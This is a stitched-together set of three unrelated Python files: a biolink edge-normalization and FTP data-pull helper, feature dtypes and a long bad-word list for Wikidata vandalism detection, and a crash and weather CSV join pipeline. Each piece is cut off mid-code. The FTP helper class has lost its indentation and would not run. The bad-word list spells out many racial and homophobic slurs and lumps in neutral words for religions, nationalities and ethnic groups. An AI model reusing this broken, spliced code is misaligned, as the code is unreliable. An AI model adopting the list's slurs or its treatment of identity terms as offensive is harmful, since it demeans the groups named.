                    end_index = last_index

                # collect a slice of records from the data frame
                data_chunk: list = to_normalize[start_index: end_index]

                # get the data
                resp: requests.models.Response = requests.get(f'https://bl-lookup-sri.renci.org/resolve_predicate?version={edge_norm_version}&predicate=' + '&predicate='.join(data_chunk))

                # did we get a good status code
                if resp.status_code == 200:
                    # convert json to dict
                    rvs: dict = resp.json()

                    # merge this list with what we have gotten so far
                    cached_edge_norms.update(**rvs)
                elif resp.status_code == 404:
                    # this should never happen but if it does fail gracefully so we use the fallback predicate
                    pass
                else:
                    # this is a real error with the edge normalizer so we bail
                    error_message = f'Edge norm response code: {resp.status_code}'
                    self.logger.error(error_message)
                    resp.raise_for_status()

                # move on down the list
                start_index += block_size
            else:
                break

        # storage for items that failed to normalize
        failed_to_normalize: list = list()

        # walk through the unique relations and extract the normalized predicate for the lookup map
        for relation in to_normalize:
            success = False
            # did the service return a value
            if relation in cached_edge_norms and cached_edge_norms[relation]:
                if 'identifier' in cached_edge_norms[relation]:
                    # store it in the look up map
                    identifier = cached_edge_norms[relation]['identifier']
                    label = cached_edge_norms[relation]['label']
                    if 'inverted' in cached_edge_norms[relation] and cached_edge_norms[relation]['inverted']:
                        inverted = True
                    else:
                        inverted = False
                    self.edge_normalization_lookup[relation] = EdgeNormalizationResult(identifier, label, inverted)
                    success = True
            if not success:
                # this should not happen but if it does use the fallback predicate
                self.edge_normalization_lookup[relation] = EdgeNormalizationResult(FALLBACK_EDGE_PREDICATE,
                                                                                   FALLBACK_EDGE_PREDICATE_LABEL)
                # if no result for whatever reason add it to the fail list
                failed_to_normalize.append(relation)

        # if something failed to normalize output it
        if failed_to_normalize:
            self.logger.debug(f'Failed to normalize: {", ".join(failed_to_normalize)}')

        # return the failed list to the caller
        return failed_to_normalize

    @staticmethod
    def get_current_edge_norm_version():
        """
        Returns the edge normalization (biolink model) version to use.

        The version is deliberately pinned; use fetch_latest_edge_norm_version()
        to query the service for the newest available version instead.
        """
        return '2.1.0'

    @staticmethod
    def fetch_latest_edge_norm_version():
        """
        Retrieves the latest available version from the edge normalization service.

        (This logic was previously unreachable dead code in
        get_current_edge_norm_version, stranded behind the hard-coded return.)
        """
        # fetch the edge norm openapi spec
        edge_norm_versions_url = 'https://bl-lookup-sri.renci.org/versions'
        resp: requests.models.Response = requests.get(edge_norm_versions_url)

        # did we get a good status code
        if resp.status_code == 200:
            # parse json
            versions = resp.json()

            # extract the latest version that isn't "latest"
            edge_norm_version = versions[-2]
            return edge_norm_version
        else:
            # this shouldn't happen, raise an exception
            resp.raise_for_status()
class GetDataPullError(Exception):
    """Raised when retrieving an external data set (e.g. via FTP) fails."""

    def __init__(self, error_message: str):
        # pass the message to Exception so str(e), repr(e) and e.args are
        # populated (previously they were empty because super().__init__ was skipped)
        super().__init__(error_message)
        # keep the explicit attribute for callers that read it directly
        self.error_message = error_message
class GetData:
"""
Class that contains methods that can be used to get various data sets.
"""
def __init__(self, log_level=logging.INFO):
    """
    constructor
    :param log_level - overrides default log level
    """
    # create a logger that writes under the directory named by DATA_SERVICES_LOGS
    # NOTE(review): raises KeyError if the DATA_SERVICES_LOGS env var is unset -
    # confirm that failing fast here is intended
    self.logger = LoggingUtil.init_logging("Data_services.Common.GetData", level=log_level, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])
@staticmethod
def pull_via_ftp_binary(ftp_site, ftp_dir, ftp_file):
    """
    Gets the ftp file in binary mode

    :param ftp_site: the URL of the ftp site
    :param ftp_dir: the directory in the ftp site
    :param ftp_file: the name of the file to retrieve
    :return: the file contents as bytes
    :raises GetDataPullError: if any step of the transfer fails
    """
    try:
        # connect, authenticate anonymously and move to the target directory
        connection = FTP(ftp_site)
        connection.login()
        connection.cwd(ftp_dir)

        # stream the transfer into an in-memory buffer
        with BytesIO() as buffer:
            connection.retrbinary(f'RETR {ftp_file}', buffer.write)
            payload = buffer.getvalue()

        # close the connection to the ftp site
        connection.quit()
    except Exception as e:
        error_message = f'GetDataPullError pull_via_ftp_binary() failed for {ftp_site}. Exception: {e}'
        raise GetDataPullError(error_message)

    # return the data stream
    return payload
def get_ftp_file_date(self, ftp_site, ftp_dir, ftp_file) -> str:
    """
    gets the modified date of the file from the ftp site

    :param ftp_site: hostname of the ftp server
    :param ftp_dir: directory on the server containing the file
    :param ftp_file: name of the file to inspect
    :return: the parsed modification date as a string, or 'Not found'
    :raises GetDataPullError: if the FTP query fails
    """
    # init the return value
    ret_val: str = 'Not found'

    try:
        # open the FTP connection and go to the directory
        ftp: FTP = FTP(ftp_site)
        ftp.login()
        try:
            ftp.cwd(ftp_dir)

            # MDTM replies like '213 YYYYMMDDHHMMSS'; split off the timestamp
            date_val = ftp.voidcmd(f'MDTM {ftp_file}').split(' ')

            # need both the reply code and the timestamp before indexing element 1
            # (the previous `len(date_val) > 0` guard still allowed an IndexError)
            if len(date_val) > 1:
                # grab the parsed date
                ret_val = dp.parse(date_val[1])
        finally:
            # always close the control connection (it previously leaked)
            ftp.quit()
    except Exception as e:
        error_message = f'Error getting modification date for ftp file: {ftp_site}{ftp_dir}{ftp_file}. {e}'
        self.logger.error(error_message)
        raise GetDataPullError(error_message)

    return str(ret_val)
def pull_via_ftp(self, ftp_site: str, ftp_dir: str, ftp_files: list, data_file_path: str) -> int:
"""
gets the requested files from UniProtKB ftp directory
:param ftp_site: url of the ftp site
:param ftp_dir: the directory in the site
:param ftp_files: the name of the file to capture
:param data_file_path: the destination of the captured file
:return: boolean pass/fail
"""
# init a | |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 29 11:48:18 2016
@author: <NAME>
"""
import numpy as np
# Column dtypes for the revision-feature CSV: free-text/identifier columns are
# str, numeric feature ratios and counts are 32-bit floats, ids are int.
# NOTE: 'afectedProperty' and 'simbolRatio' are the spellings used by the
# dataset's column headers — do not "fix" them.
data_dtypes = {
    'action': str,
    'afectedProperty': str,
    'alphanumericRatio': np.float32,
    'amount': np.float32,
    'badWordRatio': np.float32,
    'bracketRatio': np.float32,
    'commentTailLength': np.float32,
    'containsLanguageWord': np.float32,
    'containsUrl': np.float32,
    'digitRatio': np.float32,
    'fuzzy_partial': np.float32,
    'fuzzy_total': np.float32,
    'instanceOf': np.float32,
    'itemid': np.float32,
    'json_len': np.float32,
    'lang': str,
    'lang_locale': str,
    'lang_prob': np.float32,
    'languageWordRatio': np.float32,
    'latinRatio': np.float32,
    'longestCharacterSequence': np.float32,
    'longestWord': np.float32,
    'lowerCaseRatio': np.float32,
    'lowerCaseWordRatio': np.float32,
    'main_alphabet': str,
    'minor': np.float32,
    'nonLatinRatio': np.float32,
    'prev_user': str,
    'punctuationRatio': np.float32,
    'revisionid': int,
    'simbolRatio': np.float32,
    'subaction': str,
    'timestamp': str,
    'upperCaseRatio': np.float32,
    'upperCaseWordRatio': np.float32,
    'userid': int,
    'whitespaceRatio': np.float32,
}

# Dtypes for the revision metadata file (geo/session columns are free text).
meta_dtypes = {
    'REVISION_ID': int,
    'REVISION_SESSION_ID': int,
    'USER_COUNTRY_CODE': str,
    'USER_CONTINENT_CODE': str,
    'USER_TIME_ZONE': str,
    'USER_REGION_CODE': str,
    'USER_CITY_NAME': str,
    'USER_COUNTY_NAME': str,
    'REVISION_TAGS': str,
}
bad_words = ["abbo", "abo",
"abortion", "abuse", "addict", "addicts", "adult", "africa",
"african", "alla", "allah", "alligatorbait", "amateur", "american",
"anal", "analannie", "analsex", "angie", "angry", "anus", "arab",
"arabs", "areola", "argie", "aroused", "arse", "arsehole", "asian",
"ass", "assassin", "assassinate", "assassination", "assault",
"assbagger", "assblaster", "assclown", "asscowboy", "asses",
"assfuck", "assfucker", "asshat", "asshole", "assholes", "asshore",
"assjockey", "asskiss", "asskisser", "assklown", "asslick",
"asslicker", "asslover", "assman", "assmonkey", "assmunch",
"assmuncher", "asspacker", "asspirate", "asspuppies", "assranger",
"asswhore", "asswipe", "athletesfoot", "attack", "australian",
"babe", "babies", "backdoor", "backdoorman", "backseat", "badfuck",
"balllicker", "balls", "ballsack", "banging", "baptist",
"barelylegal", "barf", "barface", "barfface", "bast", "bastard ",
"bazongas", "bazooms", "beaner", "beast", "beastality", "beastial",
"beastiality", "beatoff", "beat-off", "beatyourmeat", "beaver",
"bestial", "bestiality", "bi", "biatch", "bible", "bicurious",
"bigass", "bigbastard", "bigbutt", "bigger", "bisexual",
"bi-sexual", "bitch", "bitcher", "bitches", "bitchez", "bitchin",
"bitching", "bitchslap", "bitchy", "biteme", "black", "blackman",
"blackout", "blacks", "blind", "blow", "blowjob", "boang", "bogan",
"bohunk", "bollick", "bollock", "bomb", "bombers", "bombing",
"bombs", "bomd", "bondage", "boner", "bong", "boob", "boobies",
"boobs", "booby", "boody", "boom", "boong", "boonga", "boonie",
"booty", "bootycall", "bountybar", "bra", "brea5t", "breast",
"breastjob", "breastlover", "breastman", "brothel", "bugger",
"buggered", "buggery", "bullcrap", "bulldike", "bulldyke",
"bullshit", "bumblefuck", "bumfuck", "bunga", "bunghole", "buried",
"burn", "butchbabes", "butchdike", "butchdyke", "butt", "buttbang",
"butt-bang", "buttface", "buttfuck", "butt-fuck", "buttfucker",
"butt-fucker", "buttfuckers", "butt-fuckers", "butthead",
"buttman", "buttmunch", "buttmuncher", "buttpirate", "buttplug",
"buttstain", "byatch", "cacker", "cameljockey", "cameltoe",
"canadian", "cancer", "carpetmuncher", "carruth", "catholic",
"catholics", "cemetery", "chav", "cherrypopper", "chickslick",
"children's", "chin", "chinaman", "chinamen", "chinese", "chink",
"chinky", "choad", "chode", "christ", "christian", "church",
"cigarette", "cigs", "clamdigger", "clamdiver", "clit", "clitoris",
"clogwog", "cocaine", "cock", "cockblock", "cockblocker",
"cockcowboy", "cockfight", "cockhead", "cockknob", "cocklicker",
"cocklover", "cocknob", "cockqueen", "cockrider", "cocksman",
"cocksmith", "cocksmoker", "cocksucer", "cocksuck ", "cocksucked ",
"cocksucker", "cocksucking", "cocktail", "cocktease", "cocky",
"cohee", "coitus", "color", "colored", "coloured", "commie",
"communist", "condom", "conservative", "conspiracy", "coolie",
"cooly", "coon", "coondog", "copulate", "cornhole", "corruption",
"cra5h", "crabs", "crack", "crackpipe", "crackwhore",
"crack-whore", "crap", "crapola", "crapper", "crappy", "crash",
"creamy", "crime", "crimes", "criminal", "criminals", "crotch",
"crotchjockey", "crotchmonkey", "crotchrot", "cum", "cumbubble",
"cumfest", "cumjockey", "cumm", "cummer", "cumming", "cumquat",
"cumqueen", "cumshot", "cunilingus", "cunillingus", "cunn",
"cunnilingus", "cunntt", "cunt", "cunteyed", "cuntfuck",
"cuntfucker", "cuntlick ", "cuntlicker ", "cuntlicking ",
"cuntsucker", "cybersex", "cyberslimer", "dago", "dahmer",
"dammit", "damn", "damnation", "damnit", "darkie", "darky",
"datnigga", "dead", "deapthroat", "death", "deepthroat",
"defecate", "dego", "demon", "deposit", "desire", "destroy",
"deth", "devil", "devilworshipper", "dick", "dickbrain",
"dickforbrains", "dickhead", "dickless", "dicklick", "dicklicker",
"dickman", "dickwad", "dickweed", "diddle", "die", "died", "dies",
"dike", "dildo", "dingleberry", "dink", "dipshit", "dipstick",
"dirty", "disease", "diseases", "disturbed", "dive", "dix",
"dixiedike", "dixiedyke", "doggiestyle", "doggystyle", "dong",
"doodoo", "doo-doo", "doom", "dope", "dragqueen", "dragqween",
"dripdick", "drug", "drunk", "drunken", "dumb", "dumbass",
"dumbbitch", "dumbfuck", "dyefly", "dyke", "easyslut", "eatballs",
"eatme", "eatpussy", "ecstacy", "ejaculate", "ejaculated",
"ejaculating ", "ejaculation", "enema", "enemy", "erect",
"erection", "ero", "escort", "ethiopian", "ethnic", "european",
"evl", "excrement", "execute", "executed", "execution",
"executioner", "explosion", "facefucker", "faeces", "fag",
"fagging", "faggot", "fagot", "failed", "failure", "fairies",
"fairy", "faith", "fannyfucker", "fart", "farted ", "farting ",
"farty ", "fastfuck", "fat", "fatah", "fatass", "fatfuck",
"fatfucker", "fatso", "fckcum", "fear", "feces", "felatio ",
"felch", "felcher", "felching", "fellatio", "feltch", "feltcher",
"feltching", "fetish", "fight", "filipina", "filipino",
"fingerfood", "fingerfuck ", "fingerfucked ", "fingerfucker ",
"fingerfuckers", "fingerfucking ", "fire", "firing", "fister",
"fistfuck", "fistfucked ", "fistfucker ", "fistfucking ",
"fisting", "flange", "flasher", "flatulence", "floo", "flydie",
"flydye", "fok", "fondle", "footaction", "footfuck", "footfucker",
"footlicker", "footstar", "fore", "foreskin", "forni", "fornicate",
"foursome", "fourtwenty", "fraud", "freakfuck", "freakyfucker",
"freefuck", "fu", "fubar", "fuc", "fucck", "fuck", "fucka",
"fuckable", "fuckbag", "fuckbuddy", "fucked", "fuckedup", "fucker",
"fuckers", "fuckface", "fuckfest", "fuckfreak", "fuckfriend",
"fuckhead", "fuckher", "fuckin", "fuckina", "fucking",
"fuckingbitch", "fuckinnuts", "fuckinright", "fuckit", "fuckknob",
"fuckme ", "fuckmehard", "fuckmonkey", "fuckoff", "fuckpig",
"fucks", "fucktard", "fuckwhore", "fuckyou", "fudgepacker",
"fugly", "fuk", "fuks", "funeral", "funfuck", "fungus", "fuuck",
"gangbang", "gangbanged ", "gangbanger", "gangsta", "gatorbait",
"gay", "gaymuthafuckinwhore", "gaysex ", "geez", "geezer", "geni",
"genital", "german", "getiton", "gin", "ginzo", "gipp", "girls",
"givehead", "glazeddonut", "gob", "god", "godammit", "goddamit",
"goddammit", "goddamn", "goddamned", "goddamnes", "goddamnit",
"goddamnmuthafucker", "goldenshower", "gonorrehea", "gonzagas",
"gook", "gotohell", "goy", "goyim", "greaseball", "gringo", "groe",
"gross", "grostulation", "gubba", "gummer", "gun", "gyp", "gypo",
"gypp", "gyppie", "gyppo", "gyppy", "hamas", "handjob", "hapa",
"harder", "hardon", "harem", "headfuck", "headlights", "hebe",
"heeb", "hell", "henhouse", "heroin", "herpes", "heterosexual",
"hijack", "hijacker", "hijacking", "hillbillies", "hindoo",
"hiscock", "hitler", "hitlerism", "hitlerist", "hiv", "ho", "hobo",
"hodgie", "hoes", "hole", "holestuffer", "homicide", "homo",
"homobangers", "homosexual", "honger", "honk", "honkers", "honkey",
"honky", "hook", "hooker", "hookers", "hooters", "hore", "hork",
"horn", "horney", "horniest", "horny", "horseshit", "hosejob",
"hoser", "hostage", "hotdamn", "hotpussy", "hottotrot", "hummer",
"husky", "hussy", "hustler", "hymen", "hymie", "iblowu", "idiot",
"ikey", "illegal", "incest", "insest", "intercourse",
"interracial", "intheass", "inthebuff", "israel", "israeli",
"israel's", "italiano", "itch", "jackass", "jackoff", "jackshit",
"jacktheripper", "jade", "jap", "japanese", "japcrap", "jebus",
"jeez", "jerkoff", "jesus", "jesuschrist", "jew", "jewish", "jiga",
"jigaboo", "jigg", "jigga", "jiggabo", "jigger ", "jiggy", "jihad",
"jijjiboo", "jimfish", "jism", "jiz ", "jizim", "jizjuice",
"jizm ", "jizz", "jizzim", "jizzum", "joint", "juggalo", "jugs",
"junglebunny", "kaffer", "kaffir", "kaffre", "kafir", "kanake",
"kid", "kigger", "kike", "kill", "killed", "killer", "killing",
"kills", "kink", "kinky", "kissass", "kkk", "knife", "knockers",
"kock", "kondum", "koon", "kotex", "krap", "krappy", "kraut",
"kum", "kumbubble", "kumbullbe", "kummer", "kumming", "kumquat",
"kums", "kunilingus", "kunnilingus", "kunt", "ky", "kyke",
"lactate", "laid", "lapdance", "latin", "lesbain", "lesbayn",
"lesbian", "lesbin", "lesbo", "lez", "lezbe", "lezbefriends",
"lezbo", "lezz", "lezzo", "liberal", "libido", "licker", "lickme",
"lies", "limey", "limpdick", "limy", "lingerie", "liquor",
"livesex", "loadedgun", "lolita", "looser", "loser", "lotion",
"lovebone", "lovegoo", "lovegun", "lovejuice", "lovemuscle",
"lovepistol", "loverocket", "lowlife", "lsd", "lubejob", "lucifer",
"luckycammeltoe", "lugan", "lynch", "macaca", "mad", "mafia",
"magicwand", "mams", "manhater", "manpaste", "marijuana",
"mastabate", "mastabater", "masterbate", "masterblaster",
"mastrabator", "masturbate", "masturbating", "mattressprincess",
"meatbeatter", "meatrack", "meth", "mexican", "mgger", "mggor",
"mickeyfinn", "mideast", "milf", "minority", "mockey", "mockie",
"mocky", "mofo", "moky", "moles", "molest", "molestation",
"molester", "molestor", "moneyshot", "mooncricket", "mormon",
"moron", "moslem", "mosshead", "mothafuck", "mothafucka",
"mothafuckaz", "mothafucked ", "mothafucker", "mothafuckin",
"mothafucking ", "mothafuckings", "motherfuck", "motherfucked",
"motherfucker", "motherfuckin", "motherfucking", "motherfuckings",
"motherlovebone", "muff", "muffdive", "muffdiver", "muffindiver",
"mufflikcer", "mulatto", "muncher", "munt", "murder", "murderer",
"muslim", "naked", "narcotic", "nasty", "nastybitch", "nastyho",
"nastyslut", "nastywhore", "nazi", "necro", "negro", "negroes",
"negroid", "negro's", "nig", "niger", "nigerian", "nigerians",
"nigg", "nigga", "niggah", "niggaracci", "niggard", "niggarded",
"niggarding", "niggardliness", "niggardliness's", "niggardly",
"niggards", "niggard's", "niggaz", "nigger", "niggerhead",
"niggerhole", "niggers", "nigger's", "niggle", "niggled",
"niggles", "niggling", "nigglings", "niggor", "niggur", "niglet",
"nignog", "nigr", "nigra", "nigre", "nip", "nipple", "nipplering",
"nittit", "nlgger", "nlggor", "nofuckingway", "nook", "nookey",
"nookie", "noonan", "nooner", "nude", "nudger", "nuke",
"nutfucker", "nymph", "ontherag", "oral", "orga", "orgasim ",
"orgasm", "orgies", "orgy", "osama", "paki", "palesimian",
"palestinian", "pansies", "pansy", "panti", "panties", "payo",
"pearlnecklace", "peck", "pecker", "peckerwood", "pee", "peehole",
"pee-pee", "peepshow", "peepshpw", "pendy", "penetration", "peni5",
"penile", "penis", "penises", "penthouse", "period", "perv",
"phonesex", "phuk", "phuked", "phuking", "phukked", "phukking",
"phungky", "phuq", "pi55", "picaninny", "piccaninny", "pickaninny",
"piker", "pikey", "piky", "pimp", "pimped", "pimper", "pimpjuic",
"pimpjuice", "pimpsimp", "pindick", "piss", "pissed", "pisser",
"pisses ", "pisshead", "pissin ", "pissing", "pissoff ", "pistol",
"pixie", "pixy", "playboy", "playgirl", "pocha", "pocho",
"pocketpool", "pohm", "polack", "pom", "pommie", "pommy", "poo",
"poon", "poontang", "poop", "pooper", "pooperscooper", "pooping",
"poorwhitetrash", "popimp", "porchmonkey", "porn", "pornflick",
"pornking", "porno", "pornography", "pornprincess", "pot",
"poverty", "premature", "pric", "prick", "prickhead", "primetime",
"propaganda", "pros", "prostitute", "protestant", "pu55i", "pu55y",
"pube", "pubic", "pubiclice", "pud", "pudboy", "pudd", "puddboy",
"puke", "puntang", "purinapricness", "puss", "pussie", "pussies",
"pussy", "pussycat", "pussyeater", "pussyfucker", "pussylicker",
"pussylips", "pussylover", "pussypounder", "pusy", "quashie",
"queef", "queer", "quickie", "quim", "ra8s", "rabbi", "racial",
"racist", "radical", "radicals", "raghead", "randy", "rape",
"raped", "raper", "rapist", "rearend", "rearentry", "rectum",
"redlight", "redneck", "reefer", "reestie", "refugee", "reject",
"remains", "rentafuck", "republican", "rere", "retard", "retarded",
"ribbed", "rigger", "rimjob", "rimming", "roach", "robber",
"roundeye", "rump", "russki", "russkie", "sadis", "sadom",
"samckdaddy", "sandm", "sandnigger", "satan", "scag", "scallywag",
"scat", "schlong", "screw", "screwyou", "scrotum", "scum", "semen",
"seppo", "servant", "sex", "sexed", "sexfarm", "sexhound",
"sexhouse", "sexing", "sexkitten", "sexpot", "sexslave", "sextogo",
"sextoy", "sextoys", "sexual", "sexually", "sexwhore", "sexy",
"sexymoma", "sexy-slim", "shag", "shaggin", "shagging", "shat",
"shav", "shawtypimp", "sheeney", "shhit", "shinola", "shit",
"shitcan", "shitdick", "shite", "shiteater", "shited", "shitface",
"shitfaced", "shitfit", "shitforbrains", "shitfuck", "shitfucker",
"shitfull", "shithapens", "shithappens", "shithead", "shithouse",
"shiting", "shitlist", "shitola", "shitoutofluck", "shits",
"shitstain", "shitted", "shitter", "shitting", "shitty ", "shoot",
| |
import errno
import json
import os
import sys
import zipfile
from datetime import datetime, timezone, timedelta
from dateutil import tz
def main():
    """Run the three pipeline stages: aggregation, CST re-slicing + GID filtering, feature join."""
    ip_dir, op_dir = getInputOutputFileNames()
    gid_static = os.path.join(ip_dir, '2020', 'gidstatic.csv')
    join_features = os.path.join(ip_dir, '2020', 'JoinFeatures.csv')

    # Task 1: aggregate the raw inputs at day and month granularity.
    aggregateFilesAtDayLevel(ipDirPath=ip_dir, opDirPath=op_dir,
                             monthInputSanityCheck=False,
                             deleteIntermediateFiles=True)
    aggregateFilesAtMonthLevel(ipDirPath=ip_dir, opDirPath=op_dir,
                               monthInputSanityCheck=False,
                               deleteIntermediateFiles=True)

    # Task 2: redistribute rows onto CST boundaries, then keep only static GIDs.
    redistributeCsvFilesForCstDay(op_dir, removeExistingCsv=False)
    redistributeCsvFilesForCstMonth(op_dir, removeExistingCsv=False)
    filterOnGidDayLevel(op_dir, gid_static)
    filterOnGidMonthLevel(op_dir, gid_static)

    # Task 3: join crash features on gid + 5-minute timestamp bucket.
    joinOFeaturesOnGidAndDateTimePerDay(op_dir, join_features, "gidFilteredFile.csv")
    joinOFeaturesOnGidAndDateTimePerMonth(op_dir, join_features, "gidFilteredFile.csv")
def getListOfJoinFeatureRows(joinFeatureFileFullPath):
    """Parse the join-features CSV into token lists, keeping only well-formed rows.

    Handles a single double-quoted field per line (the commas inside the
    quotes are preserved as part of that one token). Rows whose token count
    does not match the expected column count are dropped.
    """
    expected_len = len(getAllColumnsMap()) - 1  # last column is appended later
    rows = []
    with open(joinFeatureFileFullPath, 'r') as fh:
        fh.readline()  # skip header
        for raw in fh:
            if ",\"" in raw:
                # split around the quoted field: before / quoted / after
                parts = raw.split("\"")
                tokens = parts[0].split(',')[0:-1]
                tokens.append(parts[1])
                tokens.extend(parts[2].split(',')[1:])
            else:
                tokens = raw.split(",")
            if len(tokens) == expected_len:
                rows.append(tokens)
    return rows
def mapOfJoinFeatureRowsOfFiveMinIntervals(listOfJoinFeatureRows):
    """Bucket join-feature rows by crash datetime snapped down to 5-minute marks.

    The computed key ('YYYY-MM-DDTHH:MM:SSZ') is appended to each row, and the
    returned dict maps each key to the list of rows that share it.
    """
    cols = getAllColumnsMap()
    buckets = {}
    for row in listOfJoinFeatureRows:
        crash_date = datetime.strptime(row[cols["CRASH_DATE"]], '%Y%m%d')
        crash_time = datetime.strptime(row[cols["TIMESTR"]], '%H:%M')
        # snap the time down to the previous 5-minute boundary
        crash_time -= timedelta(minutes=int(row[cols["CRASH_TIME"]]) % 5)
        key = str(crash_date).split(' ')[0] + 'T' + str(crash_time).split(' ')[1] + 'Z'
        row.append(key)
        buckets.setdefault(key, []).append(row)
    return buckets
def addRowToJoinFile(joinedFilePath, dataRowString):
    """Append one joined row to joinedFilePath, writing a header first if the file is new.

    BUG FIX: the original only ever created the header and silently dropped
    dataRowString — the row is now actually appended.
    :param joinedFilePath: destination join file
    :param dataRowString: fully formatted row text (newline-terminated)
    """
    if not os.path.exists(joinedFilePath):
        with open(joinedFilePath, "w") as out:
            out.write("gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST, ")
            out.write(str(getAllColumnsMap().keys()) + "\n")
    with open(joinedFilePath, "a") as out:
        out.write(dataRowString)
def joinOneFile(cstCsvFile, mapOfJoinFeatureRows, joinedFilePath):
    """Append rows of cstCsvFile whose CST timestamp has matching crash features.

    The last column of each aggregated row is the CST timestamp; rows whose
    timestamp appears in mapOfJoinFeatureRows are written to joinedFilePath
    together with the stringified list of matching feature rows.
    """
    with open(cstCsvFile, 'r') as src:
        src.readline()  # skip header
        for line in src:
            # the join key is the last column (strip the trailing newline)
            key = line[:-1].split(',')[-1]
            # BUG FIX: the original tested membership with the key but indexed
            # the map with line[-1] — the final *character* of the line.
            if key in mapOfJoinFeatureRows:
                # keep the row on one line: strip the embedded newline before joining
                dataRowString = line[:-1] + "," + str(mapOfJoinFeatureRows[key]) + "\n"
                addRowToJoinFile(joinedFilePath, dataRowString)
def joinOFeaturesOnGidAndDateTimePerDay(opDirPath, joinFeatureFileFullPath, gidFilteredFileName,
                                        joinedFileName="joinFile.csv"):
    """For every year/month/day folder, join the GID-filtered CSV with the crash-feature map."""
    feature_rows = getListOfJoinFeatureRows(joinFeatureFileFullPath)
    feature_map = mapOfJoinFeatureRowsOfFiveMinIntervals(feature_rows)
    for year in os.listdir(opDirPath):
        year_dir = os.path.join(opDirPath, year)
        if not os.path.isdir(year_dir):
            continue
        for month in os.listdir(year_dir):
            month_dir = os.path.join(year_dir, month)
            if not os.path.isdir(month_dir):
                continue
            for day in os.listdir(month_dir):
                day_dir = os.path.join(month_dir, day)
                if not os.path.isdir(day_dir):
                    continue
                # source: filtered aggregated data; destination: joined output
                src = os.path.join(day_dir, gidFilteredFileName)
                dst = os.path.join(day_dir, joinedFileName)
                if os.path.exists(dst):
                    os.remove(dst)  # always rebuild from scratch
                joinOneFile(src, feature_map, dst)
                print("joined ", src, " added to ", dst)
def joinOFeaturesOnGidAndDateTimePerMonth(opDirPath, joinFeatureFileFullPath, gidFilteredFileName,
                                          joinedFileName="joinFile.csv"):
    """For every year/month folder, join the GID-filtered CSV with the crash-feature map."""
    feature_rows = getListOfJoinFeatureRows(joinFeatureFileFullPath)
    feature_map = mapOfJoinFeatureRowsOfFiveMinIntervals(feature_rows)
    for year in os.listdir(opDirPath):
        year_dir = os.path.join(opDirPath, year)
        if not os.path.isdir(year_dir):
            continue
        for month in os.listdir(year_dir):
            month_dir = os.path.join(year_dir, month)
            if not os.path.isdir(month_dir):
                continue
            # source: filtered aggregated data; destination: joined output
            src = os.path.join(month_dir, gidFilteredFileName)
            dst = os.path.join(month_dir, joinedFileName)
            if os.path.exists(dst):
                os.remove(dst)  # always rebuild from scratch
            joinOneFile(src, feature_map, dst)
            print("joined ", src, " added to ", dst)
def appendLineInFile(line, gidPartitionFileFullPath):
    """Append one CSV line to the partition file, creating it with a header when new."""
    if not os.path.exists(gidPartitionFileFullPath):
        with open(gidPartitionFileFullPath, "w") as out:
            out.write("gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST\n")
        print("Created filtered file ", gidPartitionFileFullPath)
    with open(gidPartitionFileFullPath, "a") as out:
        out.write(line)
def getAllColumnsMap():
    """Return a mapping from join-features CSV column name to its 0-based index.

    The final key, 'crash_time_and_crash_date', is the 5-minute-bucketed
    timestamp that mapOfJoinFeatureRowsOfFiveMinIntervals appends to each row.
    """
    # Column order mirrors the source CSV exactly; indices follow from position.
    column_order = [
        "OID", "Join_Count", "TARGET_FID", "CRASH_KEY", "CASENUMBER",
        "LECASENUM", "XCOORD", "YCOORD", "REPORTTYPE", "DOTDSTRCT",
        "ISPDSTRCT", "RPA", "MPO", "COUNTY", "CITYBR",
        "URBANAREA", "CVLTWPID", "TWNRNGSECT", "SCHDST1011", "AEA1011",
        "STID1011", "DNRDSTRCT", "DNRWLDMGMT", "DNRWLDDEPR", "DNRFLDOFF",
        "CRASH_YEAR", "X", "Y", "Longitude", "Latitude",
        "FIRSTHARM", "CRCOMANNER", "MAJORCAUSE", "DRUGALCREL", "ECONTCIRC",
        "WEATHER1", "WEATHER2", "LIGHT", "CSURFCOND", "ZCOORD",
        "LANEDIR", "OVERUNDER", "LITDESC", "GIMSDATE", "LOCTOOLV",
        "CAPTURED", "CRASH_DATE", "CRASHMONTH", "DAYOFMONTH", "CRASH_DAY",
        "CRASH_TIME", "TIMESTR", "TIMEDAY", "TIMEBIN", "TIMEBIN1",
        "TIMEBIN30", "LIGHTING", "DAYLIGHT", "DARKNESS", "LOCFSTHARM",
        "RURALURBAN", "CITY", "CITYNAME", "SYSTEM", "ROUTE",
        "SYSTEMSTR", "CARDINAL", "RAMP", "COROADRTE", "LITERAL",
        "ROADCLASS", "INTCLASS", "SYSTEMCONC", "RCONTCIRC", "ROADTYPE",
        "FRA", "PAVED", "CSEVERITY", "FATALITIES", "INJURIES",
        "MAJINJURY", "MININJURY", "POSSINJURY", "UNKINJURY", "PROPDMG",
        "VEHICLES", "TOCCUPANTS", "WZ_RELATED", "WZ_LOC", "WZ_TYPE",
        "WZ_ACTVTY", "WORKERS", "gid", "LL_row", "LL_col",
        "LL_Long", "LL_Lat", "LR_row", "LR_col", "LR_Long",
        "LR_Lat", "UR_row", "UR_col", "UR_Long", "UR_Lat",
        "UL_row", "UL_col", "UL_Long", "UL_Lat",
        "crash_time_and_crash_date",
    ]
    return {name: index for index, name in enumerate(column_order)}
def filterOneFile(cstCsvFile, setOfGidsTOInclude, filteredFileName):
    """Copy rows of cstCsvFile whose gid (first column) is in setOfGidsTOInclude.

    :param cstCsvFile: source CSV with a header row
    :param setOfGidsTOInclude: set of gid strings to keep
    :param filteredFileName: destination file (header written by appendLineInFile)
    """
    count = 0
    includedRows = 0
    with open(cstCsvFile, "r") as src:
        src.readline()  # skip header
        for line in src:
            # BUG FIX: the original advanced the reader before appending, so the
            # row *after* each matching gid was written instead of the match.
            gid = line.split(sep=',')[0]
            if gid in setOfGidsTOInclude:
                appendLineInFile(line, filteredFileName)
                includedRows += 1
            count += 1
            if count % 100000 == 0:
                print("Processed ", count, " rows from file ", cstCsvFile, " : included ", includedRows, " rows")
def filterOnGidMonthLevel(opDirPath, gidFileFullPath, cstCsvFileName="cstAggregated.csv"):
    """Filter each month-level aggregated CSV to rows whose gid is in the static GID file."""
    keep = createSetOfGidFromFile(gidFileFullPath)
    for year in os.listdir(opDirPath):
        year_dir = os.path.join(opDirPath, year)
        if not os.path.isdir(year_dir):
            continue
